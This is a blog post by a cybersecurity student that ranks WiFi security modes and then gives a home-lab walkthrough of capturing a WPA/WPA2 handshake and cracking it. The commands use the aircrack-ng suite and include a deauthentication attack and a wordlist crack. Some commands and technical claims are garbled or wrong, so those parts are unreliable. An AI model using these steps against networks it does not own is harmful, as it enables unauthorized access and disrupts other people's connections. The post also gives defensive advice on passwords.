Open in app

Sign in

Write

Sign in

WIFI : Hacking & Which security method will work for your network.

Aditya Kumar
7 min readFeb 26, 2021

Here is the basic rating from best to worst of the modern WiFi security methods available on modern routers:

WPA2 + AES

WPA + AES

WPA + TKIP/AES (TKIP is there as a fallback method)

WPA + TKIP

WEP — >Open Network (no security at all)

The best way to go is to deactivate Wi-Fi Protected Setup (WPS) and set the router to WPA2 +AES. As you go down the list, you are getting less security for your network.

Purpose
Both WPA and WPA2 are supposed to secure wireless Internet networks from unauthorized access. If you leave your router with no security then anyone can steal the bandwidth, perform illegal actions out of your connection and name, monitor your web activity, and easily install malicious apps in your network.

WPA vs. WPA2

Wifi-Routers support a variety of security protocols to secure wireless networks: WEP, WPA and WPA2. However WPA2 is recommended over its predecessor WPA (Wi-Fi Protected Access).

Probably the only downside of WPA2 is how much processing power it needs to protect your network. This means more powerful hardware is needed to avoid lower network performance. This issue concerns older access points that were implemented before WPA2 and only support WPA2 via a firmware upgrade. Most of the current access points have been supplied with more capable hardware.

Definitely use WPA2 if you can and only use WPA if there is no way your access point will support WPA2. Using WPA is also a possibility when your access point regularly experiences high loads and the network speed suffers from the WPA2 usage. When security is the top priority then rolling back is not an option, instead one should seriously consider getting better access points. WEP has to be used if there is no possibility to use any of the WPA standards.

Encryption Speed
Depending on what security protocols you use the data speed can be affected. WPA2 is the fastest of the encryption protocols, while WEP is the slowest.

In a general sense, Wi-Fi refers to the wireless LAN technologies that utilize the IEEE 802.11 standards for communications. Wi-Fi products use radio waves to transmit data from a client device to either an access point, which includes a router, and the router completes a connection to other devices on the LAN, WAN or the internet.

Hello Readers, I am Aditya Kumar currently enrolled in Master Certificate in Cyber Security HackerU (Red Team) program, this is my first blog and I want to share some of my learnings with you about common WPA/WPA2 attacks and how to crack any WPA or WPA2 Wi-Fi considering you have the Dictionary for it to crack the WPA handshake.

Wi-fi hacking is fascinating and it can bring down wifi’s with weak or mundane passwords. Wi-fi is a necessity for all who are exploring the internet. Encountering the term hacking can be Juvenile for you, but the victim is vulnerable. We will quickly go through a series of steps for hacking a WPA/WPA2 wifi network.

As the WPA/WPA2 attacks are going to be Brute force attacks or as it is called dictionary attacks we should also know how much time each password type takes to be cracked.

This also depends on your GPU spec (if you are using one) and resources allocated to the kali virtual machine.

WIFI Password Cracking For WPA & WPA2 (Home Lab)

Pre-requisites

  1. Kali Linux
  2. Aircrack-ng suite ( pre-installed in kali)
  3. Wi-Fi adapter (monitor mode compatible)
  4. WIFI Router (In this attack I am going to use my Wifi router)

Setup:

First connect the wifi dongle to the kali os machine and we need to confirm that the wifi dongle is showing in the network interface to confirm that we have to use the command to check it.

iwconfig

Step 1- Enabling monitor mode

Enable monitor mode on your wireless adapter so it can monitor all the wireless traffic

The Adapter is working

The mode is now Managed We will enable Monitor mode in wifi dongle by using the command.

airmon-ng

As you can see Monitor mode is Enabled

We will Double check with :

iwconfig

As you can see wlan0 has changed to wlan0mon and the Mode is Monitor.

Step 2- Monitor wireless connection and capture packets

Start airodump-ng to monitor all the wireless connections and single out the target.

airmon-ng start wlan0

Now we can see the BSSID i.e: the MAC address of Router and CH represents Channel.

STEP 3 -Dumping Data packets & capturing Handshake

To capture the handshake we have to use the airodump-ng command.

airodump-ng wlan0mon — bssid -c C4:71:54:0B:5B:A0 1 -w AK

Capturing data packets from the network Aditya and writing them into a file name AK Here bssid means the target MAC address and C means the channel number.

Now we have to wait for a device to connect to the target so we can capture the handshake which we use to crack the password. If no new device is connecting to the target we can disconnect the existing clients on the target by performing a Deauthentication attack.

Note:

The handshake is capture when victim user try to connect to his wifi but is not possible for every time to capture the handshake because sometime user is not in home and sometime user already connected to wifi in that condition we use the DEATH AUTHENTICATION with help of airreplay-ng. It help the victim disconnect from wifi and he agian try to connect at that time it capture the handshake if using death authentication, The link is given in below to check it.

Use this only if you are not getting a WPA Handshake

aireplay-ng -0 1 -a <target_MAC_address>-c <client_MAC_address>wlan0

  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish)

Anyway we got the Handshake so we won’t be needing the Deauth-Attack.

Step 4-Cracking the WPA/WPA2 password.

We are going to Brute-Force it. A brute force attack is an attempt to gain access to a system using successive login attempts. It can be performed manually or by using an automated script. In either case, a brute force attack tries different password combinations with the hope of discovering a valid login. Hackers work through all possible combinations hoping to guess correctly.

This is an old attack method, but it’s still effective and popular with hackers. Because depending on the length and complexity of the password, cracking it can take anywhere from a few seconds to many years.

There are 5 Types of Brute Force Attacks:

  • Simple Brute Force Attacks
  • Dictionary Attacks
  • Hybrid Brute Force Attacks
  • Reverse Brute Force Attacks
  • Credential Stuffing

We are Going to use Dictionary Attack.

Dictionary attacks: in a standard attack, a hacker chooses a target and runs possible passwords against that username. These are known as dictionary attacks. Dictionary attacks are the most basic tool in brute force attacks. While not necessarily being brute force attacks in themselves, these are often used as an important component for password cracking. Some hackers run through unabridged dictionaries and augment words with special characters and numerals or use special dictionaries of words, but this type of sequential attack is cumbersome.

There are Various Types of Dicitonary which you can use with the help of internet. For Eg: rockyou.txt is text file it contain large no of comman password in it but i wont tell all type of password it crack, it depend on wordlist for lot best word list use the rainbow table word list but they are high in Gb size, to crack the password we also need the GPU procces. If the password length is long it may took years of time as explained in Rainbow Tables.

This is the .Cap file which was created.

ls

Now For cracking the password use the aircrack-ng command to crack the AK.cap file with the help of Dirbuster

aircrack-ng -b C4:71:54:0B:5B:A0 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt AK-01.cap

Using Brute Force attack and with wordlist directory-list-lowercase-2.3-medium.txt and as we were able to crack the password.

Protect Your WiFi Network

While WPA2 offers more protection than WPA and therefore provides even more protection than WEP, the security of your router heavily depends on the password you set. WPA and WPA2 let you use passwords of up to 63 characters.

Use as many various characters in your WiFi network password as possible. Hackers are interested in easier targets, if they can’t break your password in several minutes, they will most likely move on to look for more vulnerable networks.

Hope you found this helpful. If you liked this article or if it helped you in any way. Please leave some claps.

Wifi
Wifihacking
Cybersecurity
Pentesting
Wifi Security

--

--

Aditya Kumar

Written by Aditya Kumar

21 Followers

B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams